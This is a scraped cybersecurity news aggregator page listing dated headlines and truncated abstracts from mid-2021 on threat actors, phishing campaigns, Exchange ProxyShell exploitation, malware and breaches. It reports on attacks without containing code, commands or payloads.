Microsoft has disclosed details of an evasive year-long social engineering campaign wherein the operators kept changing their obfuscation and encryption mechanisms every 37 days on average, including relying on Morse code, in an attempt to cover their tracks and surreptitiously harvest user credentials. The phishing attacks take the form of invoice-themed lures mimicking financial-related business transactions, with the emails containing an HTML file ("XLS.HTML"). The ultimate objective is to harvest usernames and passwords, which are subsequently used as an initial entry point for later infiltration attempts. Microsoft likened the attachment to a "jigsaw puzzle," noting that individual parts of the HTML file are designed to appear innocuous and slip past endpoint security software, only to reveal its true colors when these segments are decoded and assembled together. The company did not identify the hackers behind the operation. "This phishing campaign exThe Hacker News
August 13, 2021
WordPress Sites Abused in Aggah Spear-Phishing Campaign Full Text
Abstract
The Pakistan-linked threat group’s campaign uses compromised WordPress sites to deliver the Warzone RAT to manufacturing companies in Taiwan and South Korea.Threatpost
August 13, 2021
Hackers Actively Searching for Unpatched Microsoft Exchange Servers Full Text
Abstract
Threat actors are actively carrying out opportunistic scanning and exploitation of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year. The remote code execution flaws have been collectively dubbed "ProxyShell." At least 30,000 machines are affected by the vulnerabilities, according to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center. "Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities," NCC Group's Richard Warren tweeted , noting that one of the intrusions resulted in the deployment of a "C# aspx webshell in the /aspnet_client/ directory." Patched in early March 2021, ProxyLogon is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server thaThe Hacker News
August 12, 2021
Hackers now backdoor Microsoft Exchange using ProxyShell exploits Full Text
Abstract
Threat actors are actively exploiting Microsoft Exchange servers using the ProxyShell vulnerability to install backdoors for later access.BleepingComputer
August 12, 2021
Hacker claims cryptocurrency site was targeted ‘for fun,’ Full Text
Abstract
A person claiming to be behind the massive $600 million cryptocurrency breach said on Thursday they stole the digital tokens "for fun."The Hill
August 12, 2021
Threat actors behind the Poly Network hack are returning stolen funds Full Text
Abstract
The threat actor who hacked Poly Network cross-chain protocol stealing $611 million worth of cryptocurrency assets returns the stolen funds. The threat actor behind the hack of the Poly Network cross-chain protocol is now returning the stolen funds....Security Affairs
August 12, 2021
Chinese Hacker Group Targets Israel, Pretends to be Iranian Full Text
Abstract
UNC215 used new TTPs to evade detection and attribution, implement false flags, and exploit trusted relationships for lateral propagation. As per Mandiant, the threat actor is still active.Cyware Alerts - Hacker News
August 11, 2021
Hackers return portion of $600 million stolen from cryptocurrency site Full Text
Abstract
Hackers behind the breach of cryptocurrency company Poly Network on Wednesday returned almost half of the $600 million in digital tokens they stole following a plea from the company to do so.The Hill
August 10, 2021
Experts Believe Chinese Hackers Are Behind Several Attacks Targeting Israel Full Text
Abstract
A Chinese cyber espionage group has been linked to a string of intrusion activities targeting Israeli government institutions, IT providers, and telecommunications companies at least since 2019. FireEye's Mandiant threat intelligence arm attributed the campaign to an operator it tracks as "UNC215", a Chinese espionage operation that's believed to have singled out organizations around the world dating back as far as 2014, linking the group with "low confidence" to an advanced persistent threat (APT) widely known as APT27 , Emissary Panda, or Iron Tiger. "UNC215 has compromised organizations in the government, technology, telecommunications, defense, finance, entertainment, and health care sectors," FireEye's Israel and U.S. threat intel teams said in a report published today. "The group targets data and organizations which are of great interest to Beijing's financial, diplomatic, and strategic objectives," the findings reflThe Hacker News
August 10, 2021
Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers Full Text
Abstract
Unidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure. Tracked as CVE-2021-20090 (CVSS score: 9.9), the weakness concerns a path traversal vulnerability in the web interfaces of routers with Arcadyan firmware that could allow unauthenticated remote attackers to bypass authentication. Disclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone. Successful exploitation of the could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alteThe Hacker News
August 9, 2021
Threat actors are probing Microsoft Exchange servers for ProxyShell flaws Full Text
Abstract
Threat actors are actively scanning for the Microsoft Exchange ProxyShell RCE flaws after technical details were released at the Black Hat conference. Threat actors started actively scanning for the Microsoft Exchange ProxyShell remote...Security Affairs
August 7, 2021
Hackers attempt to breach Illinois State Police FOID website Full Text
Abstract
The Illinois State Police have said that they have added additional online security requirements to FOID online application system after hackers attempted to breach the site.Yahoo! Finance
August 5, 2021
ITG18: Operational Security Errors Continue to Plague Sizable Iranian Threat Group Full Text
Abstract
IBM Security X-Force researchers continue to track the infrastructure and activity of a suspected Iranian threat group ITG18. This group’s TTPs overlap with Charming Kitten, Phosphorus, and TA453.Security Intelligence
August 5, 2021
Watch a Hacker Hijack a Capsule Hotel’s Lights, Fans, and Beds Full Text
Abstract
A security researcher exploited IoT flaws that allowed him to hijack the controls for any room at the hotel to mess with its lights, ventilation, and the beds in each room that convert to a couch.Wired
August 4, 2021
‘I’m Calling About Your Car Warranty’, aka PII Hijinx Full Text
Abstract
Black Hat: Researchers created 300 fake identities, signed them up on 185 legit sites, then tracked how much the sites used signup PII to pester the accounts.Threatpost
August 03, 2021
Chinese Hackers Target Major Southeast Asian Telecom Companies Full Text
Abstract
Three distinct clusters of malicious activities operating on behalf of Chinese state interests have staged a series of attacks to target networks belonging to at least five major telecommunications companies located in Southeast Asian countries since 2017. "The goal of the attackers behind these intrusions was to gain and maintain continuous access to telecommunication providers and to facilitate cyber espionage by collecting sensitive information, compromising high-profile business assets such as the billing servers that contain Call Detail Record (CDR) data, as well as key network components such as the Domain Controllers, Web Servers and Microsoft Exchange servers," Cybereason's Lior Rochberger, Tom Fakterman, Daniel Frank, and Assaf Dahan revealed in a technical analysis published Tuesday. The Boston-based cybersecurity firm linked the campaigns to three different Chinese threat actors, namely Gallium (aka Soft Cell), Naikon APT (aka APT30 or Lotus Panda), aThe Hacker News
August 1, 2021
GhostEmperor, a new Chinese-speaking threat actor targets Southeast Asia Full Text
Abstract
Kaspersky experts spotted a previously undocumented Chinese-speaking threat actor, tracked as GhostEmperor, that is targeting Microsoft Exchange flaws in attacks on high-profile victims. Kaspersky spotted a new Chinese-speaking threat actor, tracked...Security Affairs
July 31, 2021
Evidence suggests Russia’s SVR is still using ‘WellMess’ malware, despite US warnings Full Text
Abstract
RiskIQ said in a report that it uncovered active hacking infrastructure that Western governments attributed last summer to the Russian SVR intelligence agency-linked APT29 or Cozy Bear, which it used at the time to try to steal Covid-19 research.Cyberscoop
July 30, 2021
SolarWinds hackers accessed over two dozen federal prosecutors’ offices: DOJ Full Text
Abstract
The Department of Justice (DOJ) said Friday that the hackers behind the major SolarWinds attack compromised employee accounts in more than two dozen federal prosecutors’ offices.The Hill
July 29, 2021
Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs Full Text
Abstract
An unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an "unusual" campaign. The backdoor is distributed via a decoy document named "Manifest.docx" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. The malware-laced document claims to be a "Manifesto of the inhabitants of Crimea" calling on the citizens to oppose Russian President Vladimir Putin and "create a unified platform called 'People's Resistance.'" The Internet Explorer flaw, tracked as CVE-2021-26411 , is notable for the fact that it was abused by theThe Hacker News
July 28, 2021
Hackers posed as flirtatious UK aerobics instructor while targeting US defense contractor’s employee Full Text
Abstract
Cybersecurity researchers said that hackers with ties to the Iranian government targeted U.S. defense contractors in attempts to install malware, including by posing as a United Kingdom-based aerobics instructor.The Hill
July 28, 2021
Chinese Hackers Implant PlugX Variant on Compromised MS Exchange Servers Full Text
Abstract
A Chinese cyberespionage group known for targeting Southeast Asia leveraged flaws in the Microsoft Exchange Server that came to light earlier this March to deploy a previously undocumented variant of a remote access trojan (RAT) on compromised systems. Attributing the intrusions to a threat actor named PKPLUG (aka Mustang Panda and HoneyMyte), Palo Alto Networks' Unit 42 threat intelligence team said it identified a new version of the modular PlugX malware, called Thor, that was delivered as a post-exploitation tool to one of the breached servers. Dating back to as early as 2008, PlugX is a fully-featured second-stage implant with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote command shell. "The variant observed [...] is unique in that it contains a change to its core source code: the replacement of its trademark word 'PLUG' to 'THOR,'" Unit 42 researchers Mike Harbison anThe Hacker News
July 28, 2021
Hackers Posed as Aerobics Instructors for Years to Target Aerospace Employees Full Text
Abstract
An Iranian cyberespionage group masqueraded as an aerobics instructor on Facebook in an attempt to infect the machine of an employee of an aerospace defense contractor with malware as part of a years-long social engineering and targeted malware campaign. Enterprise security firm Proofpoint attributed the covert operation to a state-aligned threat actor it tracks as TA456, and by the wider cybersecurity community under the monikers Tortoiseshell and Imperial Kitten. "Using the social media persona 'Marcella Flores,' TA456 built a relationship across corporate and personal communication platforms with an employee of a small subsidiary of an aerospace defense contractor," Proofpoint said in a report shared with The Hacker News. "In early June 2021, the threat actor attempted to capitalize on this relationship by sending the target malware via an ongoing email communication chain." Earlier this month, Facebook revealed it took steps to dismantle a &quoThe Hacker News
July 28, 2021
Fake Software Cracks: A Shady Work of Threat Actors Full Text
Abstract
These types of software are distributed via shady sites, YouTube, and torrents to trick victims into believing that they are downloading the latest software or a game installer.Cyware Alerts - Hacker News
July 27, 2021
Hackers flooded the Babuk ransomware gang’s forum with gay porn images Full Text
Abstract
The Babuk ransomware operators seem to have suffered a ransomware attack, threat actors flooded their forum gay orgy porn images. At the end of June, the Babuk Locker ransomware was leaked online allowing threat actors to use it to create their own version...Security Affairs
July 21, 2021
TA2721: A New Threat Group Spreading Bandook Malware Full Text
Abstract
Proofpoint discovered a new threat group, TA2721, targeting global organizations across finance, entertainment, and other industries via malspam emails written in Spanish. A highly-targeted campaign by TA2721 suggests that the group has a clear goal and prepares well before launching attacks. Secur ... Read MoreCyware Alerts - Hacker News
July 21, 2021
Chinese state hackers breached over a dozen US pipeline operators Full Text
Abstract
Chinese state-sponsored attackers have breached 13 US oil and natural gas (ONG) pipeline companies between December 2011 to 2013 following a spear-phishing campaign targeting their employees.BleepingComputer
July 19, 2021
Chinese hackers blamed for breach of Norwegian parliament email accounts Full Text
Abstract
The Norwegian government on Monday formally attributed a breach of email accounts associated with the Norwegian parliament, or the Storting, earlier this year to Chinese hackers involved in the exploitation of vulnerabilities in Microsoft’s Exchange Server.The Hill
July 19, 2021
India: Hackers use ransomware to target techies, demand cryptocurrency Full Text
Abstract
The hackers targeted their data, especially important files that had been compressed by the techies to transmit from their laptops to their official clients or their offices.The Times Of India
July 16, 2021
Facebook Suspends Accounts Used by Iranian Hackers to Target US Military Personnel Full Text
Abstract
Facebook on Thursday disclosed it dismantled a "sophisticated" online cyber espionage campaign conducted by Iranian hackers targeting about 200 military personnel and companies in the defense and aerospace sectors in the U.S., U.K., and Europe using fake online personas on its platform. The social media giant pinned the attacks to a threat actor known as Tortoiseshell (aka Imperial Kitten) based on the fact that the adversary used similar techniques in past campaigns attributed to the threat group, which was previously known to focus on the information technology industry in Saudi Arabia, suggesting an apparent expansion of malicious activity. "This group used various malicious tactics to identify its targets and infect their devices with malware to enable espionage," said Mike Dvilyanski, Head of Cyber Espionage Investigations, and David Agranovich, Director, Threat Disruption, at Facebook. "This activity had the hallmarks of a well-resourced andThe Hacker News
July 16, 2021
Facebook Discovers Highly Targeted Iran-linked Hacking Campaign Against Defense Sector Full Text
Abstract
The hacking group known as "Tortoiseshell" targeted nearly 200 individuals associated with the military as well as defense and aerospace companies in the U.S., and to a lesser extent in the U.K.CBS News
July 15, 2021
Facebook disrupts Iranian hackers using platform to target US military personnel Full Text
Abstract
Facebook on Thursday announced that it had taken steps to disrupt a group of Iranian-based hackers that had leveraged the platform as part of a wider effort to target U.S. military personnel and the defense industry in other countries.The Hill
July 14, 2021
China-linked hacking group DEV-0322 behind Solarwinds Serv-U zero-day attacks Full Text
Abstract
Microsoft attributes the recent attacks that have targeted SolarWinds file transfer servers to a China-linked APT group that the experts tracked as DEV-0322. Microsoft said that the recent attacks against SolarWinds file transfer servers were carried...Security Affairs
July 13, 2021
Russian hacking group believed to be behind Kaseya cyber attack goes offline Full Text
Abstract
Websites on the dark web used by a criminal hacking group believed to be behind the recent massive ransomware attack on software company Kaseya went offline Tuesday.The Hill
July 13, 2021
Iranian Hackers Posing as Scholars Target Professors and Writers in Middle-East Full Text
Abstract
A sophisticated social engineering attack undertaken by an Iranian-state aligned actor targeted think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London's School of Oriental and African Studies (SOAS). Enterprise security firm Proofpoint attributed the campaign — called " Operation SpoofedScholars " — to the advanced persistent threat tracked as TA453 , which is also known by the aliases APT35 (FireEye), Charming Kitten (ClearSky), and Phosphorous (Microsoft). The government cyber warfare group is suspected to carry out intelligence efforts on behalf of the Islamic Revolutionary Guard Corps (IRGC). "Identified targets included experts in Middle Eastern affairs from think tanks, senior professors from well-known academic institutions, and journalists specializing in Middle Eastern coverage," the researchers said in a technical write-up shared with The Hacker News. "TThe Hacker News
July 12, 2021
Threat actors scrape 600 million LinkedIn profiles and are selling the data online – again Full Text
Abstract
Researchers from Cyber News Team have spotted threat actors offering for sale 600 million LinkedIn profiles scraped from the platform, again. Original post: https://cybernews.com/news/threat-actors-scrape-600-million-linkedin-profiles-and-are-selling-the-data-online-again/ For...Security Affairs
July 12, 2021
Magecart hackers hide stolen credit card data into images and bogus CSS files Full Text
Abstract
Magecart hackers continuously improve their exfiltration techniques to evade detection, they are hiding stolen credit card data into images. Magecart hackers have devised a new technique to obfuscating the malware within comment blocks and hide...Security Affairs
July 09, 2021
Magecart Hackers Hide Stolen Credit Card Data Into Images for Evasive Exfiltration Full Text
Abstract
Cybercrime actors part of the Magecart group have latched on to a new technique of obfuscating the malware code within comment blocks and encoding stolen credit card data into images and other files hosted on the server, once again demonstrating how the attackers are continuously improving their infection chains to escape detection. "One tactic that some Magecart actors employ is the dumping of swiped credit card details into image files on the server [to] avoid raising suspicion," Sucuri Security Analyst, Ben Martin, said in a write-up. "These can later be downloaded using a simple GET request at a later date." MageCart is the umbrella term given to multiple groups of cybercriminals targeting e-commerce websites with the goal of plundering credit card numbers by injecting malicious JavaScript skimmers and selling them on the black market. Sucuri attributed the attack to Magecart Group 7 based on overlaps in the tactics, techniques, and procedures (TTThe Hacker News
July 9, 2021
Hackers use a new technique in malspam attacks to disable Macro security warnings in weaponized docs Full Text
Abstract
Threat actors have devised a new trick to disable macro security warning that leverage non-malicious docs in malspam attacks. Most of the malspam campaigns leverage weaponized Microsoft Office documents and social engineering techniques to trick recipients...Security Affairs
July 08, 2021
Hackers Use New Trick to Disable Macro Security Warnings in Malicious Office Files Full Text
Abstract
While it's a norm for phishing campaigns that distribute weaponized Microsoft Office documents to prompt victims to enable macros in order to trigger the infection chain directly, new findings indicate attackers are using non-malicious documents to disable security warnings prior to executing macro code to infect victims' computers. In yet another instance of malware authors continue to evolve their techniques to evade detection, researchers from McAfee Labs stumbled upon a novel tactic that "downloads and executes malicious DLLs (ZLoader) without any malicious code present in the initial spammed attachment macro." ZLoader infections propagated using this mechanism have been primarily reported in the U.S., Canada, Spain, Japan, and Malaysia, the cybersecurity firm noted. The malware — a descendant of the infamous ZeuS banking trojan — is well known for aggressively using macro-enabled Office documents as an initial attack vector to steal credentials and personallThe Hacker News
July 8, 2021
Experts bypassed Microsoft’s emergency patch for the PrintNightmare Full Text
Abstract
The emergency patch for the PrintNightmare vulnerability released by Microsoft is incomplete and still allows RCE. Yesterday, Microsoft has released an out-of-band KB5004945 security update to address the PrintNightmare vulnerability, unfortunately,...Security Affairs
July 7, 2021
Why I Love (Breaking Into) Your Security Appliances Full Text
Abstract
David “moose” Wolpoff, CTO at Randori, discusses security appliances and VPNs and how attackers only have to “pick one lock” to invade an enterprise through them.Threatpost
July 7, 2021
Researchers Learn From Nation-State Attackers’ OpSec Mistakes Full Text
Abstract
In their investigation of the Charming Kitten group, IBM X-Force researchers investigated attackers' operational security errors to reveal the inner details of how they function and launch attacks.Dark Reading
July 6, 2021
Hacker’s Mom Puts End to 10-Month Cyber-bullying Campaign Full Text
Abstract
Cyber-bully appears to stop online abuse of 6th grader after being caught in the act by momInfosecurity Magazine
July 6, 2021
Hackers Target Formula 1 Mobile Push Notification Service to Send Unexpected Notifications to Users Full Text
Abstract
The world of Formula 1 racing was livened up over the weekend as the sport's official app sent out some unexpected notifications to its mobile app users on the eve of the Austrian Grand Prix.The Register
July 04, 2021
Hackers zero in on Tokyo Olympics Full Text
Abstract
Experts are sounding the alarm about potential cyberattacks on the Tokyo Summer Olympics from those looking to create chaos at the already embattled event.The Hill
July 2, 2021
Cobalt Strike Becomes One of the Go-To Tools for Hackers Full Text
Abstract
Cobalt Strike has become one of the most misused tools in the cybercrime world as a recent report showed a 161% year-pn-year increase in cyberattacks using this tool. T his tool is now used by general commodity malware operators rather than espionage threat actors and APTs, which makes it a worris ... Read MoreCyware Alerts - Hacker News
July 01, 2021
Researchers uncover effort by Chinese-speaking hackers to target Afghan government Full Text
Abstract
Chinese-speaking hackers recently targeted the top tiers of the Afghan government, along with the governments of other nearby nations, research published Thursday found.The Hill
July 01, 2021
NSA: Russian GRU hackers use Kubernetes to run brute force attacks Full Text
Abstract
The National Security Agency (NSA) warns that Russian nation-state hackers are conducting brute force attacks to access US networks and steal email and files.BleepingComputer
July 1, 2021
Enterprise and cloud environments have been under siege from Russian hackers since 2019 Full Text
Abstract
Hackers at Russia’s GRU have carried out a years-long, stealthy espionage campaign that targets enterprise and cloud environments in the U.S.SCMagazine
June 29, 2021
Hackers use zero-day to mass-wipe My Book Live devices Full Text
Abstract
A zero-day vulnerability in Western Digital My Book Live NAS devices allowed a threat actor to perform mass-factory resets of devices last week, leading to data loss.BleepingComputer
June 28, 2021
Microsoft investigates threat actor distributing malicious Netfilter Driver Full Text
Abstract
Microsoft is investigating an strange attack, threat actor used a driver signed by the company, the Netfilter Driver, to implant a Rootkit. Microsoft announced it is investigating a threat actor distributing malicious drivers in attacks aimed at the gaming...Security Affairs
June 28, 2021
Hackers Trick Microsoft Into Signing Netfilter Driver Loaded With Rootkit Malware Full Text
Abstract
Microsoft on Friday said it's investigating an incident wherein a driver signed by the company turned out to be a malicious Windows rootkit that was observed communicating with command-and-control (C2) servers located in China. The driver, called " Netfilter ," is said to target gaming environments, specifically in the East Asian country, with the Redmond-based firm noting that "the actor's goal is to use the driver to spoof their geo-location to cheat the system and play from anywhere." "The malware enables them to gain an advantage in games and possibly exploit other players by compromising their accounts through common tools like keyloggers," Microsoft Security Response Center (MSRC) said . The rogue code signing was spotted by Karsten Hahn, a malware analyst at German cybersecurity company G Data, who shared additional details of the rootkit, including a dropper , which is used to deploy and install Netfilter on the system. Upon succThe Hacker News
June 27, 2021
Hackers target Cisco ASA devices after a PoC exploit code was published online Full Text
Abstract
Experts warn of attacks against Cisco ASA devices after researchers have published a PoC exploit code on Twitter for a known XSS vulnerability. Experts warn of attacks against Cisco ASA devices after researchers from Positive Technologies have published...Security Affairs
June 26, 2021
Nobelium hackers accessed Microsoft customer support tools Full Text
Abstract
Microsoft says they have discovered new attacks conducted by the Russian state-sponsored Nobelium hacking group, including a hacked Microsoft support agent's computer that exposed customer's subscription information.BleepingComputer
June 25, 2021
Hackers exploit 3-years old flaw to wipe Western Digital devices Full Text
Abstract
Threat actors are wiping many Western Digital (WD) My Book Live and My Book Live Duo NAS devices likely exploiting an old vulnerability. Owners of Western Digital (WD) claim that their My Book Live and My Book Live Duo network-attached storage (NAS)...Security Affairs
June 25, 2021
Hackers Crack Pirated Games with Cryptojacking Malware Full Text
Abstract
Threat actors have so far made about $2 million from Crackonosh, which secretly mines Monero cryptocurrency from affected devices.Threatpost
June 23, 2021
Pakistan-linked hackers targeted Indian power company with ReverseRat Full Text
Abstract
A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research. "Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan," Lumen's Black Lotus Labs said in a Tuesday analysis. "The potentially compromised victims aligned with the government and power utility verticals." Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization. The covert operation is said to have begun at least in January 2021. The intrusions are notable for a number of reasons, not least because in addition to its highly-targeted nature, the tactics, techniques, and procedures (TTPs) adopted by the adversary rely on repurposed open-source code and the use of compromised domThe Hacker News
June 22, 2021
RedFoxtrot Group Linked to Unit 69010 from China Full Text
Abstract
Cyberespionage campaigns spread across several years were linked to the Chinese military group PLA Unit 69010. Dubbed RedFoxtrot, the threat actor focused on gathering military intelligence from various countries. Learn how PLA-affiliated groups are operating and targeting victims.Cyware Alerts - Hacker News
June 21, 2021
Molerats Hackers Actively Targeting Middle East Governments Full Text
Abstract
Proofpoint discovered that the MoleRATs hacking group, which has become active again after a two-month break, is infiltrating government networks in the Middle East. The group has constantly been targeting entities working with the government or other geopolitical entities in the region.Cyware Alerts - Hacker News
June 19, 2021
RedFoxtrot operations linked to China’s PLA Unit 69010 due to bad opsec Full Text
Abstract
Experts attribute a series of cyber-espionage campaigns dating back to 2014, and focused on gathering military intelligence, to China-linked Unit 69010. Experts from Recorded Future’s Insikt Group linked a series of attacks, part of RedFoxtrot China-linked...Security Affairs
June 18, 2021
Cyber espionage by Chinese hackers in neighbouring nations is on the rise Full Text
Abstract
A string of cyber espionage campaigns dating all the way back to 2014 and focused on gathering military intelligence from neighbouring countries have been linked to a Chinese military-intelligence apparatus. In a wide-ranging report published by Massachusetts-headquartered Recorded Future this week, the cybersecurity firm's Insikt Group said it identified ties between a group it tracks as " RedFoxtrot " to the People's Liberation Army (PLA) Unit 69010 operating out of Ürümqi, the capital of the Xinjiang Uyghur Autonomous Region in the country. Previously called the Lanzhou Military Region's Second Technical Reconnaissance Bureau, Unit 69010 is a military cover for a Technical Reconnaissance Bureau (TRB) within China's Strategic Support Force (SSF) Network Systems Department ( NSD ). The connection to PLA Unit 69010 stems from what the researchers said were "lax operational security measures" adopted by an unnamed suspected RedFoxtrot threat actThe Hacker News
June 17, 2021
Suspected Iranian Hackers Exploit Chrome, Telegram, VPN Apps to Spy Over Dissidents Full Text
Abstract
For the last six years, hackers have stalked Iranian dissidents with spying tools that mimic the software those dissidents use to protect their communications, security firm Kaspersky said Wednesday.Cyberscoop
June 16, 2021
Ferocious Kitten: 6 years of covert surveillance in Iran Full Text
Abstract
Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.Kaspersky Labs
June 15, 2021
Wear your MASQ! New Device Fingerprint Spoofing Tool Available in Dark Web Full Text
Abstract
The MASQ tool could be used by attackers to emulate device fingerprints thus allowing them to bypass fraud protection controls The Resecurity® HUNTER unit has identified a new tool available for sale in the Dark Web called MASQ, enabling bad actors...Security Affairs
June 10, 2021
Hacker Known as Max Is a 55-Year-Old Woman, Prosecutors Say Full Text
Abstract
Alla Witte, now 55, assumed the identity “Max” and started writing illicit code, according to a federal indictment unsealed on February 8 after she was detained in Miami.Bloomberg
June 10, 2021
This is how fast a password leaked on the web will be tested out by hackers Full Text
Abstract
In a new study, Agari researchers found that the accounts are actively accessed within hours of the login credentials being posted online on phishing websites and forums.ZDNet
June 8, 2021
TeamTNT Attempting to Reign on Cloud-based Platforms Full Text
Abstract
TeamTNT is targeting the credentials of 16 cloud-based platforms, including AWS and Google Cloud, which it uses for its illegitimate cryptojacking operations. Organizations are recommended to proactively block the network connections and C2 endpoints associated with TeamTNT.Cyware Alerts - Hacker News
June 8, 2021
Hacking space: How to pwn a satellite Full Text
Abstract
The first bad thing that can make lots of other bad things happen is to block communication to the device, since it makes it unusually difficult to fly up to troubleshoot on the remote end.ESET Security
June 8, 2021
Evil Corp Impersonates PayloadBin Group to Avoid Federal Sanctions Full Text
Abstract
The cybercriminals try to pin new ransomware on Babuk Locker in an effort to fly under the radar of an ongoing FBI investigation.Threatpost
June 7, 2021
TeamTNT attacks IAM credentials of AWS and Google Cloud Full Text
Abstract
Threat actors that targeted AWS cloud environments are now also targeting the credentials of 16 additional applications, including the AWS apps as well as Google Cloud credentials.SCMagazine
June 7, 2021
Hacker Group Gunning for Musk Full Text
Abstract
Anonymous blasts billionaire for “superiority complex” and alleged Bitcoin trollingInfosecurity Magazine
June 5, 2021
TeamTNT Operations Actively Enumerating Cloud Environments Full Text
Abstract
TeamTNT operations have targeted and, after compromise, exfiltrated AWS credentials, targeted Kubernetes clusters, and created new malware called Black-T that integrates open source cloud-native tools to assist in their cryptojacking operations.Palo Alto Networks
June 4, 2021
China-linked attackers breached Metropolitan Transportation Authority (MTA) using Pulse Secure zero-day Full Text
Abstract
China-linked APT breached New York City's Metropolitan Transportation Authority (MTA) network in April using a Pulse Secure zero-day. China-linked threat actors breached the network of the New York City's Metropolitan Transportation Authority (MTA)...Security Affairs
June 3, 2021
Supreme Court narrows interpretation of CFAA, to the relief of ethical hackers Full Text
Abstract
Individuals do not exceed authorized computer access if they obtain data to which they are entitled for improper reasons, 6-3 majority rules.SCMagazine
June 3, 2021
Chinese Cyberspies UNC2630 Targeting US and EU Organizations Full Text
Abstract
Experts laid bare the tactics adopted by Chinese threat actors to consistently exploit Pulse Secure VPN devices and drop malware to exfiltrate sensitive information. Looking at the scenario, security agencies need to buckle up for more challenging events and detect such threats to stay protect ... Read MoreCyware Alerts - Hacker News
June 03, 2021
New SkinnyBoy malware used by Russian hackers to breach sensitive orgs Full Text
Abstract
Security researchers have discovered a new piece of malware called SkinnyBoy that was used in spear-phishing campaigns attributed to Russian-speaking hacking group APT28.BleepingComputer
June 02, 2021
New York subway system was targeted by Chinese-linked hackers in April Full Text
Abstract
New York’s subway system was targeted by hackers with links to the Chinese government in April, according to an MTA document reported on by The New York Times.The Hill
June 02, 2021
Hacker forum contest gives $100K for new ways to steal digital assets Full Text
Abstract
The administrator of a Russian-speaking cybercriminal forum has held a contest for the community to share uncommon methods to target cryptocurrency-related technology.BleepingComputer
June 2, 2021
This is how attackers bypass AMSI anti-malware scanning protection Full Text
Abstract
AMSI's integration with Office 365 was recently upgraded to include Excel 4.0 (XLM) macro scanning to try and combat the increase of malicious macros as an infection vector.ZDNet
June 02, 2021
Researchers Uncover Hacking Operations Targeting Government Entities in South Korea Full Text
Abstract
A North Korean threat actor active since 2012 has been behind a new espionage campaign targeting high-profile government officials associated with its southern counterpart to install an Android and Windows backdoor for collecting sensitive information. Cybersecurity firm Malwarebytes attributed the activity to a threat actor tracked as Kimsuky, with the targeted entities comprising of the Korea Internet and Security Agency (KISA), Ministry of Foreign Affairs, Ambassador of the Embassy of Sri Lanka to the State, International Atomic Energy Agency (IAEA) Nuclear Security Officer, Deputy Consul General at Korean Consulate General in Hong Kong, Seoul National University, and Daishin Securities. The development is only the latest in a series of surveillance efforts aimed at South Korea. Believed to be operating on behalf of the North Korean regime, Kimsuky (aka Velvet Chollima, Black Banshee, and Thallium) has a track record of singling out South Korean entities while expanding theirThe Hacker News
May 31, 2021
Steal Web Session Cookies From Facebook in Chrome Full Text
Abstract
Cookies are simply small pieces of data that the web browser uses to for a better web surfing experience. Cookies are stored in memory and the hard drive of users' computers.GB Hackers
May 29, 2021
Microsoft: Russian hackers used 4 new malware in USAID phishing Full Text
Abstract
Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).BleepingComputer
May 29, 2021
The Bizarro Streaming Site That Hackers Built From Scratch Full Text
Abstract
The BravoMovies campaign, spotted by researchers at security firm ProofPoint, has been around since at least early May. While many of its elements seem absurd at a glance, it shows just how far hackers are willing to go to ensnare their victims.Wired
May 29, 2021
Researchers Demonstrate 2 New Hacks to Modify Certified PDF Documents Full Text
Abstract
Cybersecurity researchers have disclosed two new attack techniques on certified PDF documents that could potentially enable an attacker to alter a document's visible content by displaying malicious content over the certified content without invalidating its signature. "The attack idea exploits the flexibility of PDF certification, which allows signing or adding annotations to certified documents under different permission levels," said researchers from Ruhr-University Bochum, who have systematically analyzed the security of the PDF specification over the years. The findings were presented at the 42nd IEEE Symposium on Security and Privacy ( IEEE S&P 2021 ) held this week. The two attacks — dubbed Evil Annotation and Sneaky Signature attacks — hinge on manipulating the PDF certification process by exploiting flaws in the specification that governs the implementation of digital signatures (aka approval signature) and its more flexible variant called certificaThe Hacker News
May 28, 2021
Microsoft: Russian SVR hackers target govt agencies from 24 countries Full Text
Abstract
The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russian-backed hackers behind the SolarWinds supply-chain attack are now coordinating an ongoing phishing campaign targeting government agencies worldwide.BleepingComputer
May 28, 2021
Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices Full Text
Abstract
